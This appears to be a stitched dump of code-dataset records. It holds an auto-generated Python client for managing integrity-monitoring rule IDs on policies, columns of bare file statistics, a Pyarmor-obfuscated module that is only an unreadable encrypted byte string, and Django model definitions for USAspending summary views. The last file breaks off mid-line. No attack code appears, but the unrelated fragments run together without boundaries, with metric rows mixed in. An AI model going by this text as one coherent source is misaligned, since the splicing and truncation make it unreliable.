make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_integrity_monitoring_rule_ids_to_policy_with_http_info(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param str api_version: The version of the api being called. (required) :param RuleIDs integrity_monitoring_rule_ids: The ID numbers of the integrity monitoring rules to add. :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. """ all_params = ['policy_id', 'api_version', 'integrity_monitoring_rule_ids', 'overrides'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_integrity_monitoring_rule_ids_to_policy" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'policy_id' is set if ('policy_id' not in params or params['policy_id'] is None): raise ValueError("Missing the required parameter `policy_id` when calling `add_integrity_monitoring_rule_ids_to_policy`") # noqa: E501 # verify the required parameter 'api_version' is set if ('api_version' not in params or params['api_version'] is None): raise ValueError("Missing the required parameter `api_version` when calling `add_integrity_monitoring_rule_ids_to_policy`") # noqa: E501 if 'policy_id' in params and not re.search('\\d+', str(params['policy_id'])): # noqa: E501 raise ValueError("Invalid value for parameter `policy_id` when calling `add_integrity_monitoring_rule_ids_to_policy`, must conform to the pattern `/\\d+/`") # noqa: E501 collection_formats = {} path_params = {} if 'policy_id' in params: path_params['policyID'] = params['policy_id'] # noqa: E501 query_params = [] if 'overrides' in params: query_params.append(('overrides', params['overrides'])) # noqa: E501 header_params = {} if 'api_version' in params: header_params['api-version'] = params['api_version'] # noqa: E501 form_params = [] local_var_files = {} body_params = None if 'integrity_monitoring_rule_ids' in params: body_params = params['integrity_monitoring_rule_ids'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['DefaultAuthentication'] # noqa: E501 return self.api_client.call_api( '/policies/{policyID}/integritymonitoring/assignments', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='IntegrityMonitoringAssignments', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def list_integrity_monitoring_rule_ids_on_policy(self, policy_id, api_version, **kwargs): # noqa: E501 """List Integrity Monitoring Rule IDs # noqa: E501 Lists all integrity monitoring rule IDs assigned to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.list_integrity_monitoring_rule_ids_on_policy(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param str api_version: The version of the api being called. (required) :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.list_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 else: (data) = self.list_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 return data def list_integrity_monitoring_rule_ids_on_policy_with_http_info(self, policy_id, api_version, **kwargs): # noqa: E501 """List Integrity Monitoring Rule IDs # noqa: E501 Lists all integrity monitoring rule IDs assigned to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.list_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param str api_version: The version of the api being called. (required) :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. """ all_params = ['policy_id', 'api_version', 'overrides'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method list_integrity_monitoring_rule_ids_on_policy" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'policy_id' is set if ('policy_id' not in params or params['policy_id'] is None): raise ValueError("Missing the required parameter `policy_id` when calling `list_integrity_monitoring_rule_ids_on_policy`") # noqa: E501 # verify the required parameter 'api_version' is set if ('api_version' not in params or params['api_version'] is None): raise ValueError("Missing the required parameter `api_version` when calling `list_integrity_monitoring_rule_ids_on_policy`") # noqa: E501 if 'policy_id' in params and not re.search('\\d+', str(params['policy_id'])): # noqa: E501 raise ValueError("Invalid value for parameter `policy_id` when calling `list_integrity_monitoring_rule_ids_on_policy`, must conform to the pattern `/\\d+/`") # noqa: E501 collection_formats = {} path_params = {} if 'policy_id' in params: path_params['policyID'] = params['policy_id'] # noqa: E501 query_params = [] if 'overrides' in params: query_params.append(('overrides', params['overrides'])) # noqa: E501 header_params = {} if 'api_version' in params: header_params['api-version'] = params['api_version'] # noqa: E501 form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['DefaultAuthentication'] # noqa: E501 return self.api_client.call_api( '/policies/{policyID}/integritymonitoring/assignments', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='IntegrityMonitoringAssignments', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def remove_integrity_monitoring_rule_id_from_policy(self, policy_id, integrity_monitoring_rule_id, api_version, **kwargs): # noqa: E501 """Remove an Integrity Monitoring Rule ID # noqa: E501 Unassign an integrity monitoring rule ID from a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.remove_integrity_monitoring_rule_id_from_policy(policy_id, integrity_monitoring_rule_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param int integrity_monitoring_rule_id: The ID number of the integrity monitoring rule to delete. (required) :param str api_version: The version of the api being called. (required) :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.remove_integrity_monitoring_rule_id_from_policy_with_http_info(policy_id, integrity_monitoring_rule_id, api_version, **kwargs) # noqa: E501 else: (data) = self.remove_integrity_monitoring_rule_id_from_policy_with_http_info(policy_id, integrity_monitoring_rule_id, api_version, **kwargs) # noqa: E501 return data def remove_integrity_monitoring_rule_id_from_policy_with_http_info(self, policy_id, integrity_monitoring_rule_id, api_version, **kwargs): # noqa: E501 """Remove an Integrity Monitoring Rule ID # noqa: E501 Unassign an integrity monitoring rule ID from a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.remove_integrity_monitoring_rule_id_from_policy_with_http_info(policy_id, integrity_monitoring_rule_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param int integrity_monitoring_rule_id: The ID number of the integrity monitoring rule to delete. (required) :param str api_version: The version of the api being called. (required) :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. """ all_params = ['policy_id', 'integrity_monitoring_rule_id', 'api_version', 'overrides'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method remove_integrity_monitoring_rule_id_from_policy" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'policy_id' is set if ('policy_id' not in params or params['policy_id'] is None): raise ValueError("Missing the required parameter `policy_id` when calling `remove_integrity_monitoring_rule_id_from_policy`") # noqa: E501 # verify the required parameter 'integrity_monitoring_rule_id' is set if ('integrity_monitoring_rule_id' not in params or params['integrity_monitoring_rule_id'] is None): raise ValueError("Missing the required parameter `integrity_monitoring_rule_id` when calling `remove_integrity_monitoring_rule_id_from_policy`") # noqa: E501 # verify the required parameter 'api_version' is set if ('api_version' not in params or params['api_version'] is None): raise ValueError("Missing the required parameter `api_version` when calling `remove_integrity_monitoring_rule_id_from_policy`") # noqa: E501 if 'policy_id' in params and not re.search('\\d+', str(params['policy_id'])): # noqa: E501 raise ValueError("Invalid value for parameter `policy_id` when calling `remove_integrity_monitoring_rule_id_from_policy`, must conform to the pattern `/\\d+/`") # noqa: E501 if 'integrity_monitoring_rule_id' in params and not re.search('\\d+', str(params['integrity_monitoring_rule_id'])): # noqa: E501 raise ValueError("Invalid value for parameter `integrity_monitoring_rule_id` when calling `remove_integrity_monitoring_rule_id_from_policy`, must conform to the pattern `/\\d+/`") # noqa: E501 collection_formats = {} path_params = {} if 'policy_id' in params: path_params['policyID'] = params['policy_id'] # noqa: E501 if 'integrity_monitoring_rule_id' in params: path_params['integrityMonitoringRuleID'] = params['integrity_monitoring_rule_id'] # noqa: E501 query_params = [] if 'overrides' in params: query_params.append(('overrides', params['overrides'])) # noqa: E501 header_params = {} if 'api_version' in params: header_params['api-version'] = params['api_version'] # noqa: E501 form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['DefaultAuthentication'] # noqa: E501 return self.api_client.call_api( '/policies/{policyID}/integritymonitoring/assignments/{integrityMonitoringRuleID}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='IntegrityMonitoringAssignments', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def set_integrity_monitoring_rule_ids_on_policy(self, policy_id, api_version, **kwargs): # noqa: E501 """Set Integrity Monitoring Rule IDs # noqa: E501 Set integrity monitoring rule IDs assigned to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.set_integrity_monitoring_rule_ids_on_policy(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param str api_version: The version of the api being called. (required) :param RuleIDs integrity_monitoring_rule_ids: The ID numbers of the integrity monitoring rules to set. :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.set_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 else: (data) = self.set_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, **kwargs) # noqa: E501 return data def set_integrity_monitoring_rule_ids_on_policy_with_http_info(self, policy_id, api_version, **kwargs): # noqa: E501 """Set Integrity Monitoring Rule IDs # noqa: E501 Set integrity monitoring rule IDs assigned to a policy. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.set_integrity_monitoring_rule_ids_on_policy_with_http_info(policy_id, api_version, async_req=True) >>> result = thread.get() :param async_req bool :param int policy_id: The ID number of the policy. (required) :param str api_version: The version of the api being called. (required) :param RuleIDs integrity_monitoring_rule_ids: The ID numbers of the integrity monitoring rules to set. :param bool overrides: Return only rule IDs assigned directly to the current policy. :return: IntegrityMonitoringAssignments If the method is called asynchronously, returns the request thread. """ all_params = ['policy_id', 'api_version', 'integrity_monitoring_rule_ids', 'overrides'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method set_integrity_monitoring_rule_ids_on_policy" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'policy_id' is set if ('policy_id' not in params or params['policy_id'] is None): raise ValueError("Missing the required parameter `policy_id` when calling `set_integrity_monitoring_rule_ids_on_policy`") # noqa: E501 # verify the required parameter 'api_version' is set if ('api_version' not in params or params['api_version'] is None): raise ValueError("Missing the required parameter `api_version` when calling `set_integrity_monitoring_rule_ids_on_policy`") # noqa: E501 if 'policy_id' in params and not re.search('\\d+', str(params['policy_id'])): # noqa: E501 raise ValueError("Invalid value for parameter `policy_id` when calling `set_integrity_monitoring_rule_ids_on_policy`, must conform to the pattern `/\\d+/`") # noqa: E501 collection_formats = {} path_params = {} if 'policy_id' in params: path_params['policyID'] = params['policy_id'] # noqa: E501 query_params = [] if 'overrides' in params: query_params.append(('overrides', params['overrides'])) # noqa: E501 header_params = {} if 'api_version' in params: header_params['api-version'] = params['api_version'] # noqa: E501 form_params = [] local_var_files = {} body_params = None if 'integrity_monitoring_rule_ids' in params: body_params = params['integrity_monitoring_rule_ids'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['DefaultAuthentication'] # noqa: E501 return self.api_client.call_api( '/policies/{policyID}/integritymonitoring/assignments', 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='IntegrityMonitoringAssignments', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats)
51.247525
311
0.650966
3,086
25,880
5.182437
0.067401
0.109298
0.126555
0.084537
0.952417
0.948665
0.947352
0.933221
0.926655
0.916151
0
0.01515
0.268006
25,880
504
312
51.349206
0.829075
0.342736
0
0.786765
0
0
0.289823
0.12917
0
0
0
0
0
1
0.033088
false
0
0.014706
0
0.095588
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
1c06a98490cee0eb3cd0cb851a8cf721d4cc8b8e
1,731
py
Python
legacy/functional_code/backprojection/constants.py
jjimmykang/bwsi-backprojection
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
[ "MIT" ]
1
2020-02-09T19:09:27.000Z
2020-02-09T19:09:27.000Z
legacy/functional_code/backprojection/constants.py
jjimmykang/bwsi-backprojection
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
[ "MIT" ]
null
null
null
legacy/functional_code/backprojection/constants.py
jjimmykang/bwsi-backprojection
440e21f90e2a1d0d1c28bfd9a0faaf97129378a5
[ "MIT" ]
null
null
null
__pyarmor__(__name__, __file__, b'\xeb\x50\x8c\x64\x26\x42\xd6\x01\x6f\x0f\x27\xa2\x64\x8d\x1e\xb5\x54\xd9\x61\x57\x2f\x56\x03\x35\x46\xfc\x25\x13\x9b\xa4\xd5\x79\x12\xdf\x07\xc8\x90\xe3\x6a\x8e\x9c\xc3\x2c\xef\xeb\x51\x2c\xd9\x53\x06\xf5\x41\x2c\xbb\x3d\xdb\xb5\xf7\xa6\xb1\x21\x95\x63\x51\x50\x56\x7c\x01\xc3\xb6\x7a\x0d\xab\xef\x9f\xb0\x9f\x66\x08\x13\xb6\x9d\xe2\x54\x87\x5f\x86\x89\xf1\xb0\x9c\x81\x30\x32\xa1\x09\x50\xad\xb8\xfd\xaf\x78\x9b\xed\xd5\xcc\x2b\xf2\x23\xf3\x7c\x24\xea\x3a\xf2\x44\x3b\x27\xe9\xa1\x50\x0a\x75\x34\x63\xee\xaa\x6a\xef\xdb\xed\x33\x37\xdc\x52\x24\x65\x52\x5b\x61\x8f\x32\x6d\xe7\x28\x2c\xb3\xc1\x0a\x5b\x8c\xdd\x66\xb6\x6f\x19\xdb\xb1\xc3\x28\x32\xdf\x65\xc2\x1f\xbb\x6f\x81\x6b\x8d\x13\x5e\x59\xb1\xe6\xd1\xb5\xbb\xba\xb0\x2b\x14\x1a\x7d\xea\xe8\x17\xd6\x28\x91\x68\xf5\x79\x9c\xfc\xd8\x31\xae\xab\x4e\xd8\xff\x38\x7e\xe0\x8c\x04\x3e\x3c\x0f\x1b\xc7\x11\x17\x6b\xc3\xe6\xf9\x16\x2d\x26\x54\x09\xfe\xc5\x6b\x26\x7c\x30\x1a\xdd\xfd\x97\xe6\x86\xa9\xfc\x84\x67\x75\xc0\x7e\x4c\xf1\xf9\xdb\x25\xa5\x7b\xe5\xf0\x9f\xfd\xc1\x5d\xb8\xc1\x43\xd4\x96\x8a\xa4\x0d\x4e\x1d\x5a\xa4\x6f\x7e\xed\x15\x9e\x0d\x9d\xb3\x72\xa7\xd3\x6e\xb0\x56\x26\x56\xb9\x97\xa3\xf1\x1c\xfe\x03\x2a\xdc\xe5\x4e\xf4\x43\x2f\x8d\x97\x83\x38\xeb\x2e\x7e\x3d\x6d\x57\x3d\x7e\xb3\xb8\x66\x51\x07\x69\x2a\x4d\x15\x05\x66\xb4\xf8\xaa\x3a\x8f\xd0\xa5\xc2\x0a\x2c\x71\x73\x71\x68\xe1\xfe\x84\x0e\xe7\x40\xc7\xb9\xbf\x4e\xfa\xc8\x1f\xa3\x46\x3b\x8a\x42\xf5\xae\x9a\x53\xcf\xbb\x32\x06\x75\x79\x38\x45\xad\x30\x1b\xc6\x94\x7e\x8a\xe4\x1c\xc7\x33\x6f\x0b\x65\x4f\x95\xba\x36\x75\x8f\x58\xe0\x55\xce\xa3\x8c\x69\x0c\x45\x1d\x2b\x0d\x8c\xfc\x0b\x86\x10\xc7\x43\x73\xe3\xc9\xd6\x62\x15\xe0\x02\xb7\x53\x86\x54\x27\x2d\x30\xb8\x08\xb9\xfc\x83', 1)
1,731
1,731
0.749856
428
1,731
3.004673
0.5
0
0
0
0
0
0
0
0
0
0
0.302662
0.001733
1,731
1
1,731
1,731
0.441551
0
0
0
0
1
0.976905
0.976905
0
1
0
0
0
1
0
true
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
1
1
1
0
0
0
0
1
1
1
null
1
0
0
0
0
0
1
0
0
0
0
0
0
10
1c9c723b80873c17a91f78e5376f4c8502626f4a
39,968
py
Python
usaspending_api/awards/models_matviews.py
mikepsinn/usaspending-api
ef61e13c286eb51949e16b760fa7516255b2bfd3
[ "CC0-1.0" ]
null
null
null
usaspending_api/awards/models_matviews.py
mikepsinn/usaspending-api
ef61e13c286eb51949e16b760fa7516255b2bfd3
[ "CC0-1.0" ]
1
2021-11-15T17:54:12.000Z
2021-11-15T17:54:12.000Z
usaspending_api/awards/models_matviews.py
mikepsinn/usaspending-api
ef61e13c286eb51949e16b760fa7516255b2bfd3
[ "CC0-1.0" ]
null
null
null
import warnings from django.contrib.postgres.fields import ArrayField from django.contrib.postgres.search import SearchVectorField from django.core.cache import CacheKeyWarning from django.db import models from usaspending_api.awards.models import Award, Subaward, TransactionNormalized warnings.simplefilter("ignore", CacheKeyWarning) class UniversalTransactionView(models.Model): keyword_ts_vector = SearchVectorField() award_ts_vector = SearchVectorField() recipient_name_ts_vector = SearchVectorField() transaction = models.OneToOneField(TransactionNormalized, primary_key=True) action_date = models.DateField(blank=True, null=False) last_modified_date = models.DateField(blank=True, null=False) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) action_type = models.TextField() award_id = models.IntegerField() award_category = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) total_obligation = models.DecimalField( max_digits=15, decimal_places=2, blank=True, null=True) total_subsidy_cost = models.DecimalField(max_digits=20, decimal_places=2, null=True, blank=True) total_loan_value = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) total_obl_bin = models.TextField() fain = models.TextField() uri = models.TextField() piid = models.TextField() federal_action_obligation = models.DecimalField( max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) transaction_description = models.TextField() modification_number = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_state_code = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_zip5 = models.TextField() pop_congressional_code = models.TextField() recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_state_code = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_zip5 = models.TextField() recipient_location_congressional_code = models.TextField() naics_code = models.TextField() naics_description = models.TextField() product_or_service_code = models.TextField() product_or_service_description = models.TextField() pulled_from = models.TextField() type_of_contract_pricing = models.TextField() type_set_aside = models.TextField() extent_competed = models.TextField() cfda_number = models.TextField() cfda_title = models.TextField() recipient_id = models.IntegerField() recipient_hash = models.UUIDField() recipient_name = models.TextField() recipient_unique_id = models.TextField() parent_recipient_unique_id = models.TextField() business_categories = ArrayField(models.TextField(), default=list) awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() class Meta: managed = False db_table = 'universal_transaction_matview' class SummaryTransactionView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField(blank=True, null=False) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = models.TextField() total_obl_bin = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField( max_digits=20, db_index=True, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_state_code = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_congressional_code = models.TextField() recipient_location_zip5 = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_zip5 = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_state_code = models.TextField() pop_congressional_code = models.TextField() awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() recipient_hash = models.UUIDField() recipient_name = models.TextField() recipient_unique_id = models.TextField() parent_recipient_unique_id = models.TextField() business_categories = ArrayField(models.TextField(), default=list) cfda_number = models.TextField() cfda_title = models.TextField() product_or_service_code = models.TextField() product_or_service_description = models.TextField() naics_code = models.TextField() naics_description = models.TextField() type_of_contract_pricing = models.TextField() type_set_aside = models.TextField() extent_competed = models.TextField() counts = models.IntegerField() class Meta: managed = False db_table = 'summary_transaction_view' class UniversalAwardView(models.Model): keyword_ts_vector = SearchVectorField() award_ts_vector = SearchVectorField() recipient_name_ts_vector = SearchVectorField() award = models.OneToOneField(Award, primary_key=True) category = models.TextField() type = models.TextField() type_description = models.TextField() piid = models.TextField() fain = models.TextField() uri = models.TextField() total_obligation = models.DecimalField( max_digits=15, decimal_places=2, blank=True, null=True) description = models.TextField() total_subsidy_cost = models.DecimalField(max_digits=20, decimal_places=2, null=True, blank=True) total_loan_value = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) total_obl_bin = models.TextField() recipient_hash = models.UUIDField() recipient_id = models.IntegerField() recipient_name = models.TextField() recipient_unique_id = models.TextField() parent_recipient_unique_id = models.TextField() business_categories = ArrayField(models.TextField(), default=list) action_date = models.DateField() fiscal_year = models.IntegerField() last_modified_date = models.TextField() period_of_performance_start_date = models.DateField() period_of_performance_current_end_date = models.DateField() date_signed = models.DateField() original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_code = models.TextField() funding_toptier_agency_code = models.TextField() awarding_subtier_agency_code = models.TextField() funding_subtier_agency_code = models.TextField() recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_state_code = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_zip5 = models.TextField() recipient_location_congressional_code = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_state_code = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_city_code = models.TextField() pop_zip5 = models.TextField() pop_congressional_code = models.TextField() cfda_number = models.TextField() sai_number = models.TextField() pulled_from = models.TextField() type_of_contract_pricing = models.TextField() extent_competed = models.TextField() type_set_aside = models.TextField() product_or_service_code = models.TextField() product_or_service_description = models.TextField() naics_code = models.TextField() naics_description = models.TextField() class Meta: managed = False db_table = 'universal_award_matview' class SummaryAwardView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField(blank=True, null=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = models.TextField() category = models.TextField(blank=True, null=True) awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_award_view' class SummaryView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField(blank=True, null=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = models.TextField() awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_view' class SummaryNaicsCodesView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField(blank=True, null=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = models.TextField() naics_code = models.TextField(blank=True, null=True) naics_description = models.TextField(blank=True, null=True) generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_view_naics_codes' class SummaryPscCodesView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField(blank=True, null=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = models.TextField() product_or_service_code = models.TextField(blank=True, null=True) generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_view_psc_codes' class SummaryCfdaNumbersView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic 